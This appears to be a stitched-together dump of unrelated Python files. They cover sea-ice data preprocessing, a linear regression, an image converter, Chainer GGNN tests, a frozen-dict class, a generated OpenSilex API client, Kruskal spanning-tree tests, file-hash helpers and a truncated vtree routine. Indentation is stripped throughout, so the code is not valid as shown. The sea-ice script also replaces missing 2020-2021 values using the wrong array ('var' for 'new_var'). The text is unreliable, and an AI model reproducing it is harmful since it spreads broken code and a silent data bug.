data = np.load('/umbc/xfs1/cybertrn/sea-ice-prediction/data/merged_data/1979_2019_combined_data_25km.npz')
new_data = np.load('/umbc/xfs1/cybertrn/sea-ice-prediction/data/merged_data/2020_2021_combined_data_25km.npz')
for key in data.keys():
print(key)
# Create lists of days per month
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
leap_months = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
month_lst = []
# Create a full list of days per month for each month in 1979-2019
for i in range(1979, 2020):
if i % 4 == 0:
month_lst.append(leap_months)
else:
month_lst.append(months)
month_lst = np.array(month_lst).reshape(-1)
# List of days per month for January 2020-June 2021
new_month_lst = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31, 31, 28, 31, 30, 31, 30]
# Iterate through each variable add to the final array.
final_arr = np.zeros((len(month_lst) + len(new_month_lst), 448, 304, 10))
var_idx = 0
for key in data.keys():
print(key)
if key == 'time' or key == 'lat' or key == 'lon':
continue
day_sum = 0
var = data[key]
var = np.where(var == -999.0, float("NaN"), var) # Specify missing values as NaN
new_var = new_data[key]
new_var = np.where(new_var == -999.0, float("NaN"), var) # Specify missing values as NaN
if key == 'sea_ice': # Any sea ice value above 252 indicates land or missing. Convert these values to NaN.
new_var = np.where(new_var > 252.0, float("NaN"), new_var)
var_arr = np.zeros((len(month_lst) + len(new_month_lst), 448, 304))
print(var.shape)
print(var_arr.shape)
for i in range(len(month_lst)): # Calculate monthly means of the variable from 2020-2021 and add to overall array
var_arr[i, :, :] = np.nanmean(var[day_sum:(day_sum + month_lst[i]), :, :], axis=0)
if i % 12 == 0:
print(day_sum)
day_sum = day_sum + month_lst[i]
day_sum = 0
for j in range(len(new_month_lst)): # Calculate montly means of the variable from 2020-2021 and add to overall array
var_arr[len(month_lst) + j, :, :] = np.nanmean(new_var[day_sum:(day_sum + new_month_lst[j]), :, :], axis=0)
if j % 12 == 0:
print(day_sum)
day_sum = day_sum + new_month_lst[j]
final_arr[:, :, :, var_idx] = var_arr # Add variable monthly means to final array.
var_idx += 1
print(final_arr.shape)
print(final_arr[:, :, :, -1])
# Save final data array with shape (510, 448, 304, 10) to a numpy array.
with open("/umbc/xfs1/cybertrn/reu2021/team1/research/preprocessing/whole_data.npy", "wb") as f:
np.save(f, final_arr)
|
# coding: utf-8
from __future__ import division
import math
def mean_a(a):
sum_a = 0
count = 0
for i in a:
sum_a += i
count += 1
return sum_a / count
def find_slope(X, Y):
n = len(X)
v1 = sum([x * y for x, y in zip(X, Y)])
v2 = sum(X)
v3 = sum(Y)
v4 = sum([x * x for x in X])
v5 = v2 * v2
b = (n * v1 - v2 * v3) / (n * v4 - v5)
return b
def find_constant(X, Y, m):
mx = mean_a(X)
my = mean_a(Y)
c = my - m * mx
return c
def predict(X, m, c):
Y = []
for x in X:
y = m * x + c
Y.append(y)
return Y
def main():
print"\n"
X = [95,
85,
80,
70,
60]
Y = [85,
95,
70,
65,
70]
m = find_slope(X, Y)
c = find_constant(X, Y, m)
X1 = [80]
Y1 = predict(X1, m, c)
print Y1
print"\n"
if __name__ == '__main__':
main()
|
import sys
import cv2 as cv
import matrixConverter
if len(sys.argv) != 3:
print("usage: python3 {} <input_image> <output_image>".format(sys.argv[0]))
print("example: python3 {} image1.jpg image1_matrixed.jpg")
exit(1)
input_image = cv.imread(sys.argv[1])
if input_image is None:
print("{} not exists.".format(sys.argv[1]))
exit(1)
matrixConverter.init(input_image.shape[1], input_image.shape[0])
output_image = matrixConverter.convert(input_image)
cv.imwrite(sys.argv[2], output_image)
cv.imshow('input', input_image)
cv.imshow('output', output_image)
cv.waitKey() |
# Priority handling
SAME_LEVEL_PRIORITY_IDENTIFIER = '|||'
# Conditional decisions
OR = '||'
MANAGE_COMMAND_NAME = 'manage'
WEBHOOK_MANAGER_COMMAND_NAME = 'webhook-manage'
DEFAULT_PRIORITY_LIST = ['Critical', 'High', 'Medium', 'Low']
|
from typing import Tuple # NOQA
from chainer import cuda
from chainer import gradient_check
import numpy
import pytest
from chainer_chemistry.config import MAX_ATOMIC_NUM
from chainer_chemistry.models.ggnn import GGNN
from chainer_chemistry.models.mlp import MLP
from chainer_chemistry.models.prediction import GraphConvPredictor
from chainer_chemistry.utils.permutation import permute_adj
from chainer_chemistry.utils.permutation import permute_node
atom_size = 5
class_num = 7
n_unit = 11
out_dim = 4
batch_size = 2
num_edge_type = 3
@pytest.fixture
def model():
# type: () -> GraphConvPredictor
mlp = MLP(out_dim=class_num, hidden_dim=n_unit)
ggnn = GGNN(
out_dim=out_dim, hidden_dim=n_unit, num_edge_type=num_edge_type)
return GraphConvPredictor(ggnn, mlp)
@pytest.fixture
def data():
# type: () -> Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]
numpy.random.seed(0)
atom_data = numpy.random.randint(
0, high=MAX_ATOMIC_NUM, size=(batch_size, atom_size)).astype('i')
adj_data = numpy.random.randint(
0, high=2, size=(batch_size, num_edge_type, atom_size,
atom_size)).astype('f')
y_grad = numpy.random.uniform(-1, 1, (batch_size, class_num)).astype('f')
return atom_data, adj_data, y_grad
def check_forward(model, atom_data, adj_data):
# type: (GraphConvPredictor, numpy.ndarray, numpy.ndarray) -> None
y_actual = cuda.to_cpu(model(atom_data, adj_data).data)
assert y_actual.shape == (batch_size, class_num)
def test_forward_cpu(model, data):
# type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
check_forward(model, *data[:2])
@pytest.mark.gpu
def test_forward_gpu(model, data):
# type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
atom_data, adj_data = map(cuda.to_gpu, data[:2])
model.to_gpu()
check_forward(model, atom_data, adj_data)
def test_backward_cpu(model, data):
# type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
atom_data, adj_data, y_grad = data
gradient_check.check_backward(
model, (atom_data, adj_data), y_grad, atol=1e-3, rtol=1e-3)
@pytest.mark.gpu
def test_backward_gpu(model, data):
# type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
atom_data, adj_data, y_grad = map(cuda.to_gpu, data)
model.to_gpu()
gradient_check.check_backward(
model, (atom_data, adj_data), y_grad, atol=1e-3, rtol=1e-3)
def test_forward_cpu_graph_invariant(model, data):
# type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
atom_data, adj_data = data[:2]
y_actual = cuda.to_cpu(model(atom_data, adj_data).data)
permutation_index = numpy.random.permutation(atom_size)
permute_atom_data = permute_node(atom_data, permutation_index)
permute_adj_data = permute_adj(adj_data, permutation_index)
permute_y_actual = cuda.to_cpu(
model(permute_atom_data, permute_adj_data).data)
assert numpy.allclose(y_actual, permute_y_actual, rtol=1e-5, atol=1e-5)
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
|
from collections.abc import Mapping
class kfrozendict(Mapping):
"""
pulled from pypi's `frozendict` library which
itself seems to be inspired by https://stackoverflow.com/a/2704866
this is an immutable wrapper around python dictionaries
"""
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
self._hash = None
def copy(self, **add_or_replace):
return self.__class__(self, **add_or_replace)
def renamed(self, from_key, to_key):
if from_key not in self:
return self
keyvals = []
for (ikey, ival) in self.items():
if ikey == from_key:
ikey = to_key
keyvals.append(
(ikey, ival)
)
return self.__class__(dict(keyvals))
def without(self, key, **kwargs):
content, removed = self.popout(key, **kwargs)
return content
def popout(self, key, _default=None):
val = _default
keyvals = []
for (ikey, ival) in self.items():
if ikey == key:
val = ival
else:
keyvals.append(
(ikey, ival)
)
return (
self.__class__(dict(keyvals)),
val,
)
def __getitem__(self, key):
return self._dict[key]
def __contains__(self, key):
return key in self._dict
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, unfreeze(self._dict))
def __hash__(self):
if self._hash is None:
h = 0
for key, value in self._dict.items():
h ^= hash((key, value))
self._hash = h
return self._hash
def copy_in(self, **kwargs):
for (k, val) in kwargs.items():
kwargs[k] = deepfreeze(val)
return self.copy(**kwargs)
def unfreeze(self):
return unfreeze(self)
# 'uf' is shorthand for "unfreeze()"
@property
def uf(self):
return self.unfreeze()
def freeze(self):
return deepfreeze(self)
def unfreeze(val):
if isinstance(val, (kfrozendict, dict)):
return dict([
(ikey, unfreeze(ival))
for (ikey, ival) in val.items()
])
elif isinstance(val, (list, tuple)):
return list([
unfreeze(ival) for ival in val
])
else:
return val
def shallowfreeze(val):
'''
shallowfreeze does not go deep into the object.
it might save some time in the long run if we don't keep
calling (effectively) "deepcopy" everywhere.
'''
if isinstance(val, dict):
return kfrozendict(val)
elif isinstance(val, list):
return tuple(val)
else:
return val
def deepfreeze(val):
if isinstance(val, (kfrozendict, dict)):
return kfrozendict([
(ikey, deepfreeze(ival))
for (ikey, ival) in val.items()
])
elif isinstance(val, (list, tuple)):
return tuple(deepfreeze(ival) for ival in val)
else:
return val
class NotFrozenError(ValueError):
pass
def _shallowassertfrozen(val):
if isinstance(val, (dict, list)):
raise NotFrozenError(val)
def assertfrozen(val):
if isinstance(val, (dict, list)):
raise NotFrozenError(val)
if isinstance(val, kfrozendict):
for ival in val.values():
assertfrozen(ival)
elif isinstance(val, tuple):
for ival in val:
assertfrozen(ival)
else:
# at this point, the value should at least be hashable
hash(val)
return val
def kassertfrozen(func):
# return func
def inner(*args, **kwargs):
response = func(*args, **kwargs)
assertfrozen(response)
return response
return inner
|
# coding: utf-8
"""
OpenSilex API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: INSTANCE-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from opensilexClientToolsPython.api_client import ApiClient
class MobileApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_form(self, **kwargs): # noqa: E501
"""Add a form # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_form(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param FormCreationDTO body: Form to save
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_form_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_form_with_http_info(**kwargs) # noqa: E501
return data
def create_form_with_http_info(self, **kwargs): # noqa: E501
"""Add a form # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_form_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param FormCreationDTO body: Form to save
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_form" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/mobile/forms', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_form(self, uri, **kwargs): # noqa: E501
"""Delete form # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_form(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: Form URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_form_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.delete_form_with_http_info(uri, **kwargs) # noqa: E501
return data
def delete_form_with_http_info(self, uri, **kwargs): # noqa: E501
"""Delete form # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_form_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: Form URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_form" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `delete_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/mobile/{uri}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_form_list(self, **kwargs): # noqa: E501
"""Search forms # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_form_list(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param list[str] uris: Search by uris
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[FormGetDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_form_list_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_form_list_with_http_info(**kwargs) # noqa: E501
return data
def search_form_list_with_http_info(self, **kwargs): # noqa: E501
"""Search forms # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_form_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param list[str] uris: Search by uris
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[FormGetDTO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uris', 'order_by', 'page', 'page_size', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_form_list" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `search_form_list`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `search_form_list`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'uris' in params:
query_params.append(('uris', params['uris'])) # noqa: E501
collection_formats['uris'] = 'multi' # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/mobile', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[FormGetDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update1(self, **kwargs): # noqa: E501
"""Update form # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update1(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param FormUpdateDTO body: Form description
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update1_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.update1_with_http_info(**kwargs) # noqa: E501
return data
def update1_with_http_info(self, **kwargs): # noqa: E501
"""Update form # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update1_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param FormUpdateDTO body: Form description
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update1" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/mobile', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
from unittest import TestCase
from model.graph.Graph import Graph
from model.graph.kruskal import kruskal
class TestKruskal(TestCase):
"""Tests to see that kruskal will return the set of edges corresponding
to the minimum spanning tree from various graphs"""
@staticmethod
def contains_edge(v1, v2, edges):
for edge in edges:
if (v1 == edge.from_vertice().name()
and v2 == edge.to_vertice().name()) \
or (v2 == edge.from_vertice().name()
and v1 == edge.to_vertice().name()):
return True
return False
def test_three_by_three_graph(self):
g = Graph()
# The graph looks like this:
# o - o - o
# |
# o - o - o
# |
# o - o - o
node_00 = "(0, 0)"
node_01 = "(0, 1)"
node_02 = "(0, 2)"
node_10 = "(1, 0)"
node_11 = "(1, 1)"
node_12 = "(1, 2)"
node_20 = "(2, 0)"
node_21 = "(2, 1)"
node_22 = "(2, 2)"
g.add_vertice(node_00)
g.add_vertice(node_01)
g.add_vertice(node_02)
g.add_vertice(node_10)
g.add_vertice(node_11)
g.add_vertice(node_12)
g.add_vertice(node_20)
g.add_vertice(node_21)
g.add_vertice(node_22)
g.add_edge(node_00, node_01, 0)
g.add_edge(node_01, node_02, 1)
g.add_edge(node_00, node_10, 10)
g.add_edge(node_01, node_11, 2)
g.add_edge(node_02, node_12, 11)
g.add_edge(node_10, node_11, 3)
g.add_edge(node_11, node_12, 4)
g.add_edge(node_10, node_20, 5)
g.add_edge(node_11, node_21, 12)
g.add_edge(node_12, node_22, 13)
g.add_edge(node_20, node_21, 6)
g.add_edge(node_21, node_22, 7)
kruskal_edges = kruskal(g)
self.assertEqual(8, len(kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_01, kruskal_edges))
self.assertTrue(self.contains_edge(node_01, node_02, kruskal_edges))
self.assertTrue(self.contains_edge(node_01, node_11, kruskal_edges))
self.assertTrue(self.contains_edge(node_10, node_11, kruskal_edges))
self.assertTrue(self.contains_edge(node_11, node_12, kruskal_edges))
self.assertTrue(self.contains_edge(node_10, node_20, kruskal_edges))
self.assertTrue(self.contains_edge(node_20, node_21, kruskal_edges))
self.assertTrue(self.contains_edge(node_21, node_22, kruskal_edges))
def test_two_by_three_graph(self):
g = Graph()
# The graph should look like this:
# o - o - o
# | |
# o - o o
node_00 = "(0, 0)"
node_01 = "(0, 1)"
node_02 = "(0, 2)"
node_10 = "(1, 0)"
node_11 = "(1, 1)"
node_12 = "(1, 2)"
g.add_vertice(node_00)
g.add_vertice(node_01)
g.add_vertice(node_02)
g.add_vertice(node_10)
g.add_vertice(node_11)
g.add_vertice(node_12)
g.add_edge(node_00, node_01, 0)
g.add_edge(node_01, node_02, 1)
g.add_edge(node_10, node_11, 2)
g.add_edge(node_11, node_12, 9)
g.add_edge(node_00, node_10, 3)
g.add_edge(node_01, node_11, 10)
g.add_edge(node_02, node_12, 4)
kruskal_edges = kruskal(g)
self.assertEqual(5, len(kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_01, kruskal_edges))
self.assertTrue(self.contains_edge(node_01, node_02, kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_10, kruskal_edges))
self.assertTrue(self.contains_edge(node_02, node_12, kruskal_edges))
self.assertTrue(self.contains_edge(node_10, node_11, kruskal_edges))
def test_three_by_two_graph(self):
g = Graph()
# The graph should look like this:
# o - o
# |
# o o
# | |
# o - o
node_00 = "(0, 0)"
node_01 = "(0, 1)"
node_10 = "(1, 0)"
node_11 = "(1, 1)"
node_20 = "(2, 0)"
node_21 = "(2, 1)"
g.add_vertice(node_00)
g.add_vertice(node_01)
g.add_vertice(node_10)
g.add_vertice(node_11)
g.add_vertice(node_20)
g.add_vertice(node_21)
g.add_edge(node_00, node_01, 0)
g.add_edge(node_00, node_10, 10)
g.add_edge(node_01, node_11, 1)
g.add_edge(node_10, node_11, 11)
g.add_edge(node_10, node_20, 2)
g.add_edge(node_11, node_21, 3)
g.add_edge(node_20, node_21, 4)
kruskal_edges = kruskal(g)
self.assertEqual(5, len(kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_01, kruskal_edges))
self.assertTrue(self.contains_edge(node_01, node_11, kruskal_edges))
self.assertTrue(self.contains_edge(node_11, node_21, kruskal_edges))
self.assertTrue(self.contains_edge(node_21, node_20, kruskal_edges))
self.assertTrue(self.contains_edge(node_20, node_10, kruskal_edges))
def test_two_by_two_graph(self):
g = Graph()
# The graph looks like this:
# o - o
# |
# o - o
node_00 = "(0, 0)"
node_01 = "(0, 1)"
node_10 = "(1, 0)"
node_11 = "(1, 1)"
g.add_vertice(node_00)
g.add_vertice(node_01)
g.add_vertice(node_10)
g.add_vertice(node_11)
g.add_edge(node_00, node_01, 1)
g.add_edge(node_10, node_11, 2)
g.add_edge(node_01, node_11, 3)
g.add_edge(node_00, node_11, 4)
kruskal_edges = kruskal(g)
self.assertEqual(3, len(kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_01, kruskal_edges))
self.assertTrue(self.contains_edge(node_10, node_11, kruskal_edges))
self.assertTrue(self.contains_edge(node_01, node_11, kruskal_edges))
def test_one_direction_horizontal_connection(self):
g = Graph()
# The graph looks like this:
# o - o - o
node_00 = "(0, 0)"
node_01 = "(0, 1)"
node_02 = "(0, 2)"
g.add_vertice(node_00)
g.add_vertice(node_01)
g.add_vertice(node_02)
g.add_edge(node_00, node_01, 1)
g.add_edge(node_01, node_02, 2)
kruskal_edges = kruskal(g)
self.assertEqual(2, len(kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_01, kruskal_edges))
self.assertTrue(self.contains_edge(node_01, node_02, kruskal_edges))
def test_one_direction_vertical_connection(self):
g = Graph()
node_00 = "(0, 0)"
node_10 = "(1, 0)"
node_20 = "(2, 0)"
g.add_vertice(node_00)
g.add_vertice(node_10)
g.add_vertice(node_20)
g.add_edge(node_00, node_10, 1)
g.add_edge(node_10, node_20, 2)
kruskal_edges = kruskal(g)
self.assertEqual(2, len(kruskal_edges))
self.assertTrue(self.contains_edge(node_00, node_10, kruskal_edges))
self.assertTrue(self.contains_edge(node_10, node_20, kruskal_edges))
|
import base64
import hashlib
import os
from typing import Sequence
def get_all_subpaths(root: str) -> Sequence[str]:
"""
List all relative paths under the given root
"""
root = os.path.abspath(root)
for dirname, subdirs, files in os.walk(root):
for filename in files:
full_path = os.path.abspath(os.path.join(dirname, filename))
rel_path = os.path.relpath(full_path, root)
yield rel_path
def sha256sum(filename):
"""
Helper function that calculates the hash of a file
using the SHA256 algorithm
Inspiration:
https://stackoverflow.com/a/44873382
NB: we're deliberately using `digest` instead of `hexdigest` in order to
mimic Terraform.
"""
h = hashlib.sha256()
b = bytearray(128 * 1024)
mv = memoryview(b)
with open(filename, "rb", buffering=0) as f:
for n in iter(lambda: f.readinto(mv), 0):
h.update(mv[:n])
return h.digest()
def filebase64sha256(filename):
"""
Computes the Base64-encoded SHA256 hash of a file
This function mimics its Terraform counterpart, therefore being compatible
with Pulumi's provisioning engine.
"""
h = sha256sum(filename)
b = base64.b64encode(h)
return b.decode()
|
import random
from typing import Dict
from pywmi.engines.xsdd.literals import LiteralInfo
from pywmi.engines.xsdd.vtrees.vtree import Vtree, balanced
from .primal import create_interaction_graph_from_literals
from .int_tree import IntTreeVar, IntTreeLine, IntTreeSplit, IntTreeParallel, IntTree
from .topdown_mincut import conversion_tables
def _sort_to_ordering(ordering: list, orderset: set, cut_off_index: int):
"""
Sort elements in orderset by appearance in ordering, excl. any appearing later than index cut_off_index.
The output is of type: ordering_index, element
:param ordering: A list of ordered elements
:param orderset: A list of elements to sort in order of appearance in ordering
:param cut_off_index: The index from which to start. Any element before this index is excluded from the result.
:return: Each element in orderset that appears in ordering after cut_off_index, returned in order of appearance
in ordering as type: ordering_index, element
"""
assert len(ordering) >= cut_off_index
for index in range(cut_off_index + 1, len(ordering)):
if ordering[index] in orderset:
yield index, ordering[index]
def topdown_minfill(literals: LiteralInfo) -> Vtree:
"""
Create a vtree by using a top-down min-fill approach.
:param literals: The context to create a vtree for.
:return: A vtree based on a top-down min-fill ordering.
"""
logic2cont, cont2logic = conversion_tables(literals)
# Create ordering
primal = create_interaction_graph_from_literals(cont2logic.keys(), logic2cont.values(), True, False)
primal.compute_fills()
ordering = []
neighbor_sets = []
while primal.nb_fills() > 0:
minfills = primal.get_minfills()
selected_var = minfills[random.randint(0, len(minfills) - 1)]
ordering.append(selected_var)
neighbor_sets.append(primal.connected_to[selected_var])
primal.remove_and_process_node(selected_var)
ordering.reverse()
if len(ordering) == 0:
return balanced(literals)
# Create induced graph
primal = create_interaction_graph_from_literals(cont2logic.keys(), logic2cont.values(), True, False)
for neighbors in neighbor_sets: # for each var
primal.add_edges(neighbors)
# Construct pseudo tree by depth first traversing the induced graph
int_trees: Dict[any, IntTree] = dict()
def _construct_int_tree(var, index):
""" Construct int_tree depth-first """
if int_trees.get(var, None) is not None: # Because then already covered
return None
neighbors = primal.connected_to[var]
children = list(_sort_to_ordering(ordering, neighbors, index))
if len(children) == 0:
int_tree = IntTreeVar(var)
int_trees[var] = int_tree
return int_tree
else:
trees = [_construct_int_tree(child_var, child_index) for (child_index, child_var) in children]
trees = [tree for tree in trees if tree is not None]
assert len(trees) >= 1
if len(trees) == 1:
int_tree = IntTreeLine(var, trees[0])
